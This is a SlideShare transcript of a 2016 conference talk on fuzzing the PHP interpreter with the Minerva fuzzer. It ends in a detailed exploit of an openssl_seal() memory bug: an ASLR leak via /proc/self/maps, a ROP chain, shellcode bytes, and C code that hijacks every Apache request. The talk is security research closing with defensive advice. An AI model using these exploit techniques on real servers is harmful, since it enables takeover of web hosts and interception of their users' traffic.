SlideShare a Scribd company logo

[CONFidence 2016] Mateusz Kocielski - Torturing the PHP interpreter

PROIDEA
PROIDEA

Report on the trip from fuzzing the PHP interpreter, through getting code execution, to hijacking all incoming requests sent to a web server. Thoughts on torturing interpreters, tips and tricks for exploiting vulnerabilities in the PHP core and walk-through interesting bugs found (1e-65 days included).

Technology
1 of 56
Download to read offline
Torturing the PHP interpeter Mateusz Kocielski m.kocielski@logicaltrust.net LogicalTrust Confidence Kraków, Poland, May 2016
$ whoami pentester at LogicalTrust as $DAYJOB blog: http://akat1.pl, twitter: @akat1 pl open source committer: NetBSD - libsaslc(3) & httpd(8) & security-team@ & random things... security: PHP - CVE-2010-1868, CVE-2010-1917, CVE-2010-4150, CVE-2010-4156, CVE-2011-1938, ... stunnel - CVE-2013-1762 OpenSSH - CVE-2011-0539 Apache - CVE-2014-0117, CVE-2014-0226 FreeBSD - CVE-2015-1414 NetBSD - CVE-2015-8212 ...
The hardest part of this talk is... source: http://blog.codinghorror.com/ ...to tell you that I’m a PHP developer.
The tortures - master plan source: http://oaklandacupunctureproject.com/wp-content/uploads/2013/12/its-easy.jpg torture identify bugs exploit bugs get profit repeat
Minerva Fuzzer fuzzer released at Month of PHP Security in 2010 dedicated to uncover bugs in PHP functions by generating valid random scripts written in Python (around 1000 loc) friendly Beerware license version from 2010 is available here: http://php-security.org/downloads/minerva-1.0.tar.bz2 at some point I’m going to release new version short paper about it: http://php-security.org/2010/05/11/ mops-submission-05-the-minerva-php-fuzzer/index.html
Minerva - 5 years later 5 years ago I talked about it at local OWASP meeting (to be specific 4 years and 362 days ago) we released an exploit that was capable of hijacking all requests that were sent to the Apache server ...this time we want to do it again but in the new reality (NX, ASLR’n’stuff turned on by default) we improved our fuzzing process a lot during the last few years slides in Polish: http://www.slideshare.net/logicaltrust/ 201105-owasp-fuzzing-interpretera-php
Minerva algorithm - the idea 1. script ← ”” 2. X ← Initial set of variables with their types 3. G ← Fresh variable generator 4. F ← Function database 5. for i in 1..n: 5.1 f ← GET RANDOM(F, X) 5.2 v ← G() 5.3 script ← script . v . ” = ” . f call with random arguments from X (but with proper types) 5.4 X ← X ∪ (v, f result type) 6. return script Erghghg... what?
Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
Minerva - example script (dummy type) <?php [...] $var0 = stream_context_get_default(); $var1 = is_object($var0); $var2 = pcntl_wait($var0,$var1); $var3 = create_function($var1,$var0); $var4 = stream_context_create(); $var5 = ftp_rawlist($var3,$var4,$var3); $var6 = is_dir($var2); $var7 = preg_filter($var4,$var3,$var5,$var3,$var2); $var8 = is_float($var7); $var9 = openssl_pkey_export_to_file($var3,$var1,$var5); [...]
Minerva - example script (proper types) <?php [...] $var0 = inet_ntop($b); $var1 = readline_write_history(); $var2 = urlencode($str_1); $var3 = rtrim($str_3,$str_3); $var4 = dba_handlers(); $var5 = stream_context_create(); $var6 = idate($str_3); $var7 = ftp_rawlist($var5,$var2); $var8 = ksort($var7); $var9 = use_soap_error_handler(); [...]
Minerva - template +-------------------+ | header | - header file (i.e. <?php) +-------------------+ | init | - initialization (variables etc.) +-------------------+ | generated script | - minerva algorithm . . . . | | +-------------------+ | fini | - destructors +-------------------+ | footer | - footer file (i.e. ?>) +-------------------+
Minerva - configuration file main { default_length = 100; default_output = output.php; init = conf/init.php; fini = conf/fini.php; modules = [ standard, sqlite ]; ignore_functions = [sleep, leak_variable, (...)]; } functions { standard = [ dummy zend_version(void), dummy func_num_args(void), [...] ];
Our approach: source: http://www.jtpedals.com we use something(tm) to cluster crashes we use Jenkins to automate things more on our thoughts about fuzzing: http://www.slideshare.net/slajdszer/fuzzing-challenges-alligatorcon
Tips & tricks start with small scripts (crashes generated by large ones are likely unreproducible) do not stress SSD drives you want to use Address Sanitizer (or other sanitizers) USE ZEND ALLOC = 0 - use libc allocator instead of internal one learn to automate (dedup crashes etc.) timelimit(1) is very useful!
Tips & tricks source: http://pearlsofpromiseministries.com OpenGrok - http://lxr.php.net/ HHVM has bug bounty run by Facebook https://github.com/facebook/hhvm PHP bugs are awarded by IBB bug bounty https://hackerone.com/ibb-php
The results - PHP 7.x - (HEAD) source: http://images.phpgang.com one machine: 8 cores + 16 GB ram + SSD 5 days + 8 threads = around 4 millions executions cost: arount 30 PLN = 7.5 USD 10-50 lines of code generated per test case around 4150 crashes (55 were unique): 1. unknown crash - 24 2. segmentation fault - 19 3. heap use after free - 6 4. heap buffer overflow - 4 5. stack buffer overflow - 1 6. double free - 1
The results - HHVM (HEAD) source: http://www.clipartbest.com one machine: 8 cores + 16 GB ram + SSD 5 days + 4 threads = around 800 thousands executions cost: arount 30 PLN = 7.5 USD 10-50 lines of code generated per test case around 956 crashes (63 were unique): 1. unknown crash - 33 2. segmentation fault - 19 3. heap-use-after-free - 6 4. heap-buffer-overflow - 5
The results - distribution of crashes
HHVM - HPHP::f dirname - heap-overflow <?php pathinfo("x00"); HPHP::f_dirname (path=...) at /src/hhvm/hphp/runtime/ext/std/ext_std_file.cpp: [...] 1870 char *buf = strndup(path.data(), path.size()); 1871 int len = FileUtil::dirname_helper(buf, path.size()); [...] ==27833==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000239e11 at pc 0x7b83c11 bp 0x7fffffffb430 sp 0x7fffffffb428 WRITE of size 1 at 0x602000239e11 thread T0 #0 0x7b83c10 in HPHP::FileUtil::dirname_helper(char*, int) /src/hhvm/hphp/runtime/base/file-util.cpp:348
PHP - error reporting - use-after-free <?php error_reporting(1); $var11 = date_create_immutable(); $var16 = error_reporting($var11); Log: Fixed bug #72162 (use-after-free - error_reporting) Log: Fix bug #72162 (again) Log: Revert "Fix bug #72162 (again)" ==15187== ERROR: AddressSanitizer: heap-use-after-free on address 0x600600023235 at pc 0xf89a78 bp 0x7fff001c2ec0 sp 0x7fff001c2eb8 READ of size 1 at 0x600600023235 thread T0
PHP - pcntl wait/pcntl waitpid <?php $b = 666; $c = &$b; $var5 = pcntl_wait($b,0,$c); unset($b); - convert_to_long_ex(z_status); - - status = Z_LVAL_P(z_status); + status = zval_get_long(z_status); array_init(z_rusage); - Z_LVAL_P(z_status) = status; + zval_dtor(z_status); + ZVAL_LONG(z_status, status); ==5772== ERROR: AddressSanitizer: SEGV on unknown address 0x0000000002a0 (pc 0x0000010d9674 sp 0x7fff2006d5a0 bp 0x7fff2006d650 T0)
Exploiting bugs - PHP & HEAP related problems heap overflows use-after-free - unserialize() - CVE-2015-0273 double frees - imap open() - CVE-2010-4150 5.x era allocator description - http://php-security.org/2010/05/ 07/mops-submission-03-sqlite˙single˙query-sqlite˙array˙ query-uninitialized-memory-usage/index.html#˙˙exploitation FWIW, allocator is LIFO queue usually scenario is pretty much the same: take control over zval/array memory guts
Exploiting bugs - PHP & other bugs similary like in the other software uninitialized memory access - sqlite array query() - http:// php-security.org/2010/05/07/mops-submission-03-sqlite˙single˙ query-sqlite˙array˙query-uninitialized-memory-usage/index.html heap is your friend (in a non-debug builds) everything with a dtor func t is your friend e.g.: 176 struct _zend_array { 177 zend_refcounted_h gc; [...] 195 dtor_func_t pDestructor; 196 }; http://lxr.php.net/xref/PHP˙7˙0/Zend/zend˙types.h#195
Example - openssl seal() in 2011 we hijacked all connections to the webserver using buffer overflow in socket connect() - http://seclists.org/fulldisclosure/2011/May/472 minerva found uninitialized memory usage in openssl seal(). How hard would it be to do the same in 2016? we assume to operate on Ubuntu 14.04 LTS with Apache 2.4.7 and PHP 7.0.2 (compiled manually as most distros still use 5.x branch).
openssl seal() - the bug - 1/2 4888 /* {{{ proto int openssl_seal(string data, &string sealdata, & 4889 Seals data */ 4890 PHP_FUNCTION(openssl_seal) 4891 { 4892 zval *pubkeys, *pubkey, *sealdata, *ekeys, *iv = NULL; [...] 4935 pkeys = safe_emalloc(nkeys, sizeof(*pkeys), 0); [...] 4942 /* get the public keys we are using to seal this data */ 4943 i = 0; 4944 ZEND_HASH_FOREACH_VAL(pubkeysht, pubkey) { 4945 pkeys[i] = php_openssl_evp_from_zval(pubkey, 1, NULL, 0, &key_resources[i]); 4946 if (pkeys[i] == NULL) { 4949 goto clean_exit; http://lxr.php.net/xref/PHP˙7˙0/ext/openssl/openssl.c
openssl seal() - the bug - 2/2 [...] 5000 clean_exit: 5001 for (i=0; i<nkeys; i++) { 5002 if (key_resources[i] == NULL) { 5003 EVP_PKEY_free(pkeys[i]); [...] http://lxr.php.net/xref/PHP˙7˙0/ext/openssl/openssl.c
openssl seal() - is it exploitable? 376 void EVP_PKEY_free(EVP_PKEY *x) 377 { [...] 380 if (x == NULL) 381 return; 383 i = CRYPTO_add(&x->references, -1, CRYPTO_LOCK_EVP_PKEY); 387 if (i > 0) 388 return; 395 EVP_PKEY_free_it(x); [...] 401 static void EVP_PKEY_free_it(EVP_PKEY *x) 402 { 403 if (x->ameth && x->ameth->pkey_free) { 404 x->ameth->pkey_free(x); [...]
openssl seal() - our plan 1. Stage 1 (pwning PHP) 1.1 control uninitialized memory 1.2 get (or guess) pointer that will act as a fake EVP PKEY structure 1.3 push that pointer as a value to EVP PKEY free() 1.4 basing on guesses (or leaks) build a ROP chain allowing us to execute data 1.5 execute the 2nd stage shellcode 2. Stage 2 (pwning Apache) 2.1 guess/find handlers addresses 2.2 overwrite first handler with ours evil one 2.3 get back home (do not crash apache child)
openssl seal() - RIP control ~/src/php-7.0.2/sapi/cli$ gdb ./php (gdb) r -r ’str_repeat("A", 512); openssl_seal($_, $_, $_, array_fill(0,64,0));’ Starting program: /home/rj4/src/php-7.0.2/sapi/cli/php -r ’str_repeat("A", 512); openssl_seal($_, $_, $_, array_fill(0,64,0));’ [...] 0x00007ffff5a3d837 in CRYPTO_add_lock () from /lib/x86_64-linux-gnu/libc[...] (gdb) x/i $rip => 0x7ffff5a3d837 <CRYPTO_add_lock+71>: add (%r12),%r13d (gdb) i r [...] r12 0x208 520 (gdb) print pkeys[i] $11 = (EVP_PKEY *) 0x200 (gdb) print pkeys[i+1] $12 = (EVP_PKEY *) 0x4141414141414141 (gdb) print pkeys[i+2] $13 = (EVP_PKEY *) 0x4141414141414141
openssl seal() - RIP control ~/src/php-7.0.2/sapi/cli$ cat 2.php <?php $pem = " -----BEGIN PUBLIC KEY----- MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRANG2dvm8oNiH3IciNd44VZcCAwEAAQ== -----END PUBLIC KEY-----"; /* Random RSA key */ $a = array_fill(0,64,0); $k = openssl_pkey_get_public($pem); $a[0] = $k; $a[1] = $k; $a[2] = $k; var_dump($k); str_repeat("A", 512); openssl_seal($_, $_, $_, $a); ~/src/php-7.0.2/sapi/cli$ gdb ./php [...]
openssl seal() - RIP control (gdb) r 2.php [...] (gdb) print pkeys[i] $1 = (EVP_PKEY *) 0x4141414141414141
openssl seal() - Memory layout pkeys (openssl_seal()) +----------+----------+----------+----------+----- | pkeys[0] | pkeys[1] | pkeys[2] | pkeys[3] | ... +----------+----------+----------+----------+--- | +------------------------------------+ v EVP_PKEY +------+-----------+------------+-------+----- | type | save_type | references | ameth | ... +------+-----------+------------+-------+--- | +------------------------------------+ v EVP_PKEY_ASN1_METHOD +---------+--- -+-----------+---- | pkey_id | ... | pkey_free | ... +---------+- ---+-----------+---
openssl seal() - ASLR bypass <?php function get_maps() { $fh = fopen("/proc/self/maps", "r"); $maps = fread($fh, 31337^2); fclose($fh); return explode("n", $maps); } [...] $pre = get_maps(); $buffer = str_repeat("x00", 0xff0000); $post = get_maps(); $tmp = array_diff($post, $pre); $tmp = explode(’-’, array_values($tmp)[0])[0]; for ($i = 0; $i < 8; $i++) $buffer[0xff + 12 + $i] = pack(’P’, $addr)[$i]; [...]
openssl seal() - ROP we use ROP technique to neutralise NX we ended up using gadgets from the PHP binary to pivot the stack we used the address of our controlled buffer, which luckily was on the stack then we call mprotect() and set RWX perms exploit code is here: http://akat1.pl/?id=1
openssl seal() - pwning PHP ~/src/php-7.0.2-test/sapi/cli$ ./php 3.php [+] buffer string @ 0x7f00ef400014 [+] faking EVP_PKEY @ 0x7f00ef400113 [+] faking ASN @ 0x7f00ef400113 [+] faking pkey_free @ 0x7f00ef4001af = a59203 [+] libc base @ 0x7f00f1540000 [+] mprotect @ 0x7f00f1634a20 [+] building ropchain [+] triggering openssl_seal(), spawning shell have phun... $
openssl seal() - it’s so useless source: http://www.ifunny.com
openssl seal() - hijacking apache2 requests source: http://linuxconfig.net Here’s what we want to do: 1. register memory that will survive subsequent requests 2. copy Apache handler code to the registered memory 3. register request handler that will be run really first 4. do something to clean the corrupted state and let Apache child process happily serve subsequent requests
openssl seal() - shellcode - 1-3 steps void shellcode(void *(mmap_addr)(void *, size_t, int, int, int, off_t), void *(memcpy_addr)(void *, void *, size_t), int (*ap_hook_quick_handler_addr)(void *, void *, void *, int), unsigned char *handler, size_t len) { void *handler_space; unsigned char *p; /* create space for our handler, as it needs to survive sequential * requests */ p = handler_space = mmap_addr(0, 0x2000, PROT_WRITE|PROT_EXEC|PROT_READ, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0); /* ~memcpy(3) */ while(len--) *(p++) = *(handler++); /* register new filter */ ap_hook_quick_handler_addr(handler_space, NULL, NULL, APR_HOOK_REALLY_FIRST); }
openssl seal() - shellcode - handler #define APR_HOOK_REALLY_FIRST (-10) #define OK (0) int handler(void *r) { void (*ap_rprintf_addr)(char *, void *) = (void *)0xdead; char content[16] = "hello world"; (ap_rprintf_addr)(r, content); return OK; }
openssl seal() - how to survive the PHP has a mechanism that kills scripts that run for too long which it is based on signals. if we deliver SIGPROF signal to the process, then PHP will take care of recovering our victim for us. $shellcode_stage1 = str_repeat("x90",512) . "x48xb8" . pack(’P’, $buffer_base + 0x2018) . // movabs shellcode_stage2, %rax "x49xb8" . pack(’P’, 0x1000) . // handler size "x48xb9" . pack(’P’, $buffer_base + 0x3018) . // handler "x48xba" . pack(’P’, $ap_hook_handler_addr) . // movabs ap_hook_quick_handler, %rdx "x48xbe" . pack(’P’, 0) . // UNUSED "x48xbf" . pack(’P’, $mmap_addr) . // movabs mmap,%rdi "xffxd0" . // callq %rax "xb8x27x00x00x00" . // mov $0x27,%eax - getpid syscall "x0fx05" . // syscall "xbex1bx00x00x00" . // mov $0xd,%esi - SIGPROF "x89xc7" . // mov %eax,%edi - pid "xb8x3ex00x00x00" . // mov $0x3e,%eax - kill syscall "x0fx05"; // syscall
openssl seal() - pwning apache2handler $ curl http://localhost:10080/~rj4/exp.php [+] buffer string @ 0x7f3d66c00014 [+] faking EVP_PKEY @ 0x7f3d66c00113 [+] faking ASN @ 0x7f3d66c00113 [...] [+] mmap @ 0x7f3d763c49c0 [+] apache2 base @ 0x7f3d77180000 [+] ap_rprintf @ 0x7f3d771c29c0 [+] ap_hook_quick_handler @ 0x7f3d771d6c00 [+] building ropchain [+] spraying heap [+] triggering openssl_seal()... execute it a few times to infect all children
openssl seal() - pwning apache2handler - result source: https://marinasleeps.files.wordpress.com/ $ curl http://localhost:10080/~rj4/exp.php Hello World! $ curl http://localhost:10080/whatever Hello World!
Why should I care? source: http://www.badideatshirts.com/ apache2 + mod php is a quite popular configuration (more than 650 thousands servers according to shodan.io search) this attack vector can be used to bypass disabled functoins (easier methods exists, it’s just another one) running buggy software is risky there are other bugs...
What can I do? source: http://cdn.quotesgram.com/ keep your software up2date unload unnecessary extensions do not rely on disabled functions do not rely on open basedir do not run PHP as mod php do not trust your software
Future work port Minerva to any language → Minerva$lang code coverage improvement for now we ignore the fact that PHP is object-oriented language generate language constructs variables mutation test case minimization use code coverage as input to fuzzer (like in AFL or autodafe) implement type casts implement mocks for some backends ...your ideas.
Credits Large parts of this presentation were done in cooperation with Marek Kroemeke and Filip Palian, THANKS!
Some reading material http://akat1.pl/?id=1 http://www.phpinternalsbook.com/ http://php-security.org/2010/05/11/ mops-submission-05-the-minerva-php-fuzzer/index.html http://php-security.org/2010/05/07/mops-submission-03-sqlite˙ single˙query-sqlite˙array˙query-uninitialized-memory-usage/index. html http://www.inulledmyself.com/2015/02/ exploiting-memory-corruption-bugs-in.html http://lxr.php.net/
Time for questions (and maybe answers) Q&A m.kocielski@logicaltrust.net http://akat1.pl/ @akat1 pl
[CONFidence 2016] Mateusz Kocielski - Torturing the PHP interpreter

Recommended

Minerva_lib - fuzzing tool
Minerva_lib - fuzzing toolMinerva_lib - fuzzing tool
Minerva_lib - fuzzing toolLogicaltrust pl
 
Encrypt all transports
Encrypt all transportsEncrypt all transports
Encrypt all transportsEleanor McHugh
 
Implementing Software Machines in Go and C
Implementing Software Machines in Go and CImplementing Software Machines in Go and C
Implementing Software Machines in Go and CEleanor McHugh
 
Go a crash course
Go a crash courseGo a crash course
Go a crash courseEleanor McHugh
 
Go vs C++ - CppRussia 2019 Piter BoF
Go vs C++ - CppRussia 2019 Piter BoFGo vs C++ - CppRussia 2019 Piter BoF
Go vs C++ - CppRussia 2019 Piter BoFTimur Safin
 
C Code and the Art of Obfuscation
C Code and the Art of ObfuscationC Code and the Art of Obfuscation
C Code and the Art of Obfuscationguest9006ab
 
Kotlin from-scratch 2 - functions
Kotlin from-scratch 2 - functionsKotlin from-scratch 2 - functions
Kotlin from-scratch 2 - functionsFranco Lombardo
 
Flashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas MacFlashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas MacESET Latinoamérica
 

Recommended

Minerva_lib - fuzzing tool
Minerva_lib - fuzzing toolMinerva_lib - fuzzing tool
Minerva_lib - fuzzing toolLogicaltrust pl
 
Encrypt all transports
Encrypt all transportsEncrypt all transports
Encrypt all transportsEleanor McHugh
 
Implementing Software Machines in Go and C
Implementing Software Machines in Go and CImplementing Software Machines in Go and C
Implementing Software Machines in Go and CEleanor McHugh
 
Go a crash course
Go a crash courseGo a crash course
Go a crash courseEleanor McHugh
 
Go vs C++ - CppRussia 2019 Piter BoF
Go vs C++ - CppRussia 2019 Piter BoFGo vs C++ - CppRussia 2019 Piter BoF
Go vs C++ - CppRussia 2019 Piter BoFTimur Safin
 
C Code and the Art of Obfuscation
C Code and the Art of ObfuscationC Code and the Art of Obfuscation
C Code and the Art of Obfuscationguest9006ab
 
Kotlin from-scratch 2 - functions
Kotlin from-scratch 2 - functionsKotlin from-scratch 2 - functions
Kotlin from-scratch 2 - functionsFranco Lombardo
 
Flashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas MacFlashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas MacESET Latinoamérica
 
C++ TUTORIAL 6
C++ TUTORIAL 6C++ TUTORIAL 6
C++ TUTORIAL 6Farhan Ab Rahman
 
C++ TUTORIAL 7
C++ TUTORIAL 7C++ TUTORIAL 7
C++ TUTORIAL 7Farhan Ab Rahman
 
BCSL 058 solved assignment
BCSL 058 solved assignmentBCSL 058 solved assignment
BCSL 058 solved assignmentIndira Gnadhi National Open University (IGNOU)
 
Tai lieu ky thuat lap trinh
Tai lieu ky thuat lap trinhTai lieu ky thuat lap trinh
Tai lieu ky thuat lap trinhHồ Trường
 
Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1Raphael Marques
 
Python Tidbits
Python TidbitsPython Tidbits
Python TidbitsMitchell Vitez
 
Pybelsberg — Constraint-based Programming in Python
Pybelsberg — Constraint-based Programming in PythonPybelsberg — Constraint-based Programming in Python
Pybelsberg — Constraint-based Programming in PythonChristoph Matthies
 
Py3k
Py3kPy3k
Py3kAndrew Svetlov
 
Groovy puzzlers jug-moscow-part 2
Groovy puzzlers jug-moscow-part 2Groovy puzzlers jug-moscow-part 2
Groovy puzzlers jug-moscow-part 2Evgeny Borisov
 
Mini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBMini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBRaphael Marques
 
Implementing virtual machines in go & c 2018 redux
Implementing virtual machines in go & c 2018 reduxImplementing virtual machines in go & c 2018 redux
Implementing virtual machines in go & c 2018 reduxEleanor McHugh
 
Introduction to Groovy
Introduction to GroovyIntroduction to Groovy
Introduction to GroovyAndré Faria Gomes
 
Computer graphics programs in c++
Computer graphics programs in c++Computer graphics programs in c++
Computer graphics programs in c++Ankit Kumar
 
From Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf Milan
From Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf MilanFrom Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf Milan
From Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf MilanFabio Collini
 
Groovy puzzlers по русски с Joker 2014
Groovy puzzlers по русски с Joker 2014Groovy puzzlers по русски с Joker 2014
Groovy puzzlers по русски с Joker 2014Baruch Sadogursky
 
Creating masterpieces with raphael
Creating masterpieces with raphaelCreating masterpieces with raphael
Creating masterpieces with raphaelPippi Labradoodle
 
The solution manual of c by robin
The solution manual of c by robinThe solution manual of c by robin
The solution manual of c by robinAbdullah Al Naser
 
Cg my own programs
Cg my own programsCg my own programs
Cg my own programsAmit Kapoor
 
2015 02-18 xxx-literalconvertible
2015 02-18 xxx-literalconvertible2015 02-18 xxx-literalconvertible
2015 02-18 xxx-literalconvertibleTaketo Sano
 
A Taste of Python - Devdays Toronto 2009
A Taste of Python - Devdays Toronto 2009A Taste of Python - Devdays Toronto 2009
A Taste of Python - Devdays Toronto 2009Jordan Baker
 
PLNOG16: It's time to start 5G - RAPID, Michał Szczęsny
PLNOG16: It's time to start 5G - RAPID, Michał SzczęsnyPLNOG16: It's time to start 5G - RAPID, Michał Szczęsny
PLNOG16: It's time to start 5G - RAPID, Michał SzczęsnyPROIDEA
 
CE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative Design
CE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative DesignCE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative Design
CE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative DesignPROIDEA
 

More Related Content

What's hot

Tai lieu ky thuat lap trinh
Tai lieu ky thuat lap trinhTai lieu ky thuat lap trinh
Tai lieu ky thuat lap trinhHồ Trường
 
Pybelsberg — Constraint-based Programming in Python
Pybelsberg — Constraint-based Programming in PythonPybelsberg — Constraint-based Programming in Python
Pybelsberg — Constraint-based Programming in PythonChristoph Matthies
 
Groovy puzzlers jug-moscow-part 2
Groovy puzzlers jug-moscow-part 2Groovy puzzlers jug-moscow-part 2
Groovy puzzlers jug-moscow-part 2Evgeny Borisov
 
Mini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBMini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBRaphael Marques
 
Implementing virtual machines in go & c 2018 redux
Implementing virtual machines in go & c 2018 reduxImplementing virtual machines in go & c 2018 redux
Implementing virtual machines in go & c 2018 reduxEleanor McHugh
 
Computer graphics programs in c++
Computer graphics programs in c++Computer graphics programs in c++
Computer graphics programs in c++Ankit Kumar
 
From Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf Milan
From Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf MilanFrom Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf Milan
From Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf MilanFabio Collini
 
Groovy puzzlers по русски с Joker 2014
Groovy puzzlers по русски с Joker 2014Groovy puzzlers по русски с Joker 2014
Groovy puzzlers по русски с Joker 2014Baruch Sadogursky
 
Creating masterpieces with raphael
Creating masterpieces with raphaelCreating masterpieces with raphael
Creating masterpieces with raphaelPippi Labradoodle
 
The solution manual of c by robin
The solution manual of c by robinThe solution manual of c by robin
The solution manual of c by robinAbdullah Al Naser
 
Cg my own programs
Cg my own programsCg my own programs
Cg my own programsAmit Kapoor
 
2015 02-18 xxx-literalconvertible
2015 02-18 xxx-literalconvertible2015 02-18 xxx-literalconvertible
2015 02-18 xxx-literalconvertibleTaketo Sano
 
A Taste of Python - Devdays Toronto 2009
A Taste of Python - Devdays Toronto 2009A Taste of Python - Devdays Toronto 2009
A Taste of Python - Devdays Toronto 2009Jordan Baker
 

What's hot (20)

C++ TUTORIAL 6
C++ TUTORIAL 6C++ TUTORIAL 6
C++ TUTORIAL 6
 
C++ TUTORIAL 7
C++ TUTORIAL 7C++ TUTORIAL 7
C++ TUTORIAL 7
 
BCSL 058 solved assignment
BCSL 058 solved assignmentBCSL 058 solved assignment
BCSL 058 solved assignment
 
Tai lieu ky thuat lap trinh
Tai lieu ky thuat lap trinhTai lieu ky thuat lap trinh
Tai lieu ky thuat lap trinh
 
Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1
 
Python Tidbits
Python TidbitsPython Tidbits
Python Tidbits
 
Pybelsberg — Constraint-based Programming in Python
Pybelsberg — Constraint-based Programming in PythonPybelsberg — Constraint-based Programming in Python
Pybelsberg — Constraint-based Programming in Python
 
Py3k
Py3kPy3k
Py3k
 
Groovy puzzlers jug-moscow-part 2
Groovy puzzlers jug-moscow-part 2Groovy puzzlers jug-moscow-part 2
Groovy puzzlers jug-moscow-part 2
 
Mini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBMini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPB
 
Implementing virtual machines in go & c 2018 redux
Implementing virtual machines in go & c 2018 reduxImplementing virtual machines in go & c 2018 redux
Implementing virtual machines in go & c 2018 redux
 
Introduction to Groovy
Introduction to GroovyIntroduction to Groovy
Introduction to Groovy
 
Computer graphics programs in c++
Computer graphics programs in c++Computer graphics programs in c++
Computer graphics programs in c++
 
From Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf Milan
From Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf MilanFrom Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf Milan
From Java to Kotlin beyond alt+shift+cmd+k - Kotlin Community Conf Milan
 
Groovy puzzlers по русски с Joker 2014
Groovy puzzlers по русски с Joker 2014Groovy puzzlers по русски с Joker 2014
Groovy puzzlers по русски с Joker 2014
 
Creating masterpieces with raphael
Creating masterpieces with raphaelCreating masterpieces with raphael
Creating masterpieces with raphael
 
The solution manual of c by robin
The solution manual of c by robinThe solution manual of c by robin
The solution manual of c by robin
 
Cg my own programs
Cg my own programsCg my own programs
Cg my own programs
 
2015 02-18 xxx-literalconvertible
2015 02-18 xxx-literalconvertible2015 02-18 xxx-literalconvertible
2015 02-18 xxx-literalconvertible
 
A Taste of Python - Devdays Toronto 2009
